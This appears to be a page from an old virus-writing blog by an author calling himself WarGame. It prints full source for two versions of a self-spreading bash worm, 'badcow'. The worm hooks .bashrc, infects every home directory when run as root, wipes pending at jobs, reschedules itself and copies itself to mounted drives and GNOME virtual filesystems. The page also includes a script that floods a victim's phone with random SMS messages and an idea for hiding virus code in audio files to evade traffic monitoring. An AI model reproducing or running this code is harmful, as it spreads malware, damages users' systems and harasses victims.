I have just discovered a nice tool called arss that allows you to play with spectrogram of sound signals.
It would be very cool to use this for vx stuff.
You could for example hide the virus code in the spectrum of an audio file so the virus can be stored in an http server and then downloaded (and extracted) using a dropper to the host system …
There is no suspect traffic in this way
Hide virus in sounds …
January 3rd, 2010Bash scripting 2
January 1st, 2010I have improved a bit the bash worm, now it uses gvfs features too.
#!/bin/bash
# the badcow by WarGame
if [ ! -f "$HOME/.badcow.sh" ];
then
echo $HOME/.badcow.sh >> $HOME/.bashrc
fi
cp $0 $HOME/.badcow.sh > /dev/null 2>&1
chmod +x $HOME/.badcow.sh > /dev/null 2>&1
if [ "$(id -u)" = "0" ];
then
for dr_home in `ls /home`
do
if [ -d "/home/$dr_home" ];
then
if [ ! -f "/home/$dr_home/.badcow.sh" ];
then
echo /home/$dr_home/.badcow.sh >> /home/$dr_home/.bashrc
fi
cp $HOME/.badcow.sh /home/$dr_home/.badcow.sh > /dev/null 2>&1
chmod 0755 /home/$dr_home/.badcow.sh > /dev/null 2>&1
chmod +x /home/$dr_home/.badcow.sh > /dev/null 2>&1
fi
done
exit 0
fi
if [ -d "$HOME/.gvfs" ]; # try to spread using the gnome virtual filesystem
then
for vfs in `ls $HOME/.gvfs`
do
if [ -d "$HOME/.gvfs/$vfs" ];
then
cp $HOME/.badcow.sh $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&1
chmod +x $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&1
fi
done
fi
for job in $(atq | awk '{print $1}' )
do
atrm $job > /dev/null 2>&1
done
at now + 10 minutes -f $HOME/.badcow.sh > /dev/null 2>&1
for dr in $(mount | awk '{print $3}' ) # try to copy itself in mounted drives
do
if [ -d "$dr" ];
then
cp $HOME/.badcow.sh $dr/badcow.sh > /dev/null 2>&1
chmod +x $dr/badcow.sh > /dev/null 2>&1
fi
done
Bash scripting …
December 30th, 2009I have just entered in the world of bash scripting and this is my first experiment in this language:
#!/bin/bash
# the badcow
if [ ! -f "$HOME/.badcow.sh" ];
then
echo $HOME/.badcow.sh >> $HOME/.bashrc
fi
cp $0 $HOME/.badcow.sh > /dev/null 2>&1
chmod +x $HOME/.badcow.sh > /dev/null 2>&1
if [ "$(id -u)" = "0" ];
then
for dr_home in `ls /home`
do
if [ -d /home/$dr_home ];
then
if [ ! -f "/home/$dr_home/.badcow.sh" ];
then
echo /home/$dr_home/.badcow.sh >> /home/$dr_home/.bashrc
fi
cp $HOME/.badcow.sh /home/$dr_home/.badcow.sh > /dev/null 2>&1
chmod 0755 /home/$dr_home/.badcow.sh > /dev/null 2>&1
chmod +x /home/$dr_home/.badcow.sh > /dev/null 2>&1
fi
done
exit 0
fi
for job in $(atq | awk '{print $1}' )
do
atrm $job > /dev/null 2>&1
done
at now + 10 minutes -f $HOME/.badcow.sh > /dev/null 2>&1
for dr in $(mount | awk '{print $3}' )
do
if [ -d $dr ];
then
cp $HOME/.badcow.sh $dr/badcow.sh > /dev/null 2>&1
chmod +x $dr/badcow.sh > /dev/null 2>&1
fi
done
It is a simple example of worm spreading via removable media under linux (even if it works on FreeBSD too) … it’s not very powerful because there is no autorun feature under unix so it needs to be executed by the user
Wordpress remote admin password vulnerability
August 12th, 2009Files for Ransom … or Not
July 24th, 2009An old skool exploit :D
July 21st, 2009Origami in PDF
July 11th, 2009
Origami is a tool that let you insert javascript code inside pdf documents and do other nice things.
PDF format can be abused a lot! (as recent attacks say)
Persistent bios infection
June 14th, 2009Phrack#66 is out and it contains a very nice article about injecting your own code in the BIOS eeprom.
You can read it here.
Yet an other XSS worm
April 13th, 2009Annoying stuff
April 11th, 2009How to spend your time during a long travel:
# flood a victim telephone with random generated sms (for pys60)
import messaging
import appuifw
import randomdef rnd():
return random.randint(97,97+26)num=appuifw.query(u"telephone number?","text")
cnt=appuifw.query(u"how many?","number")while abs(cnt)>0:
testo=chr(rnd())+chr(rnd())+chr(rnd())+chr(rnd())+chr(rnd())
messaging.sms_send(num,testo)
cnt=cnt-1
print "sent: "+testo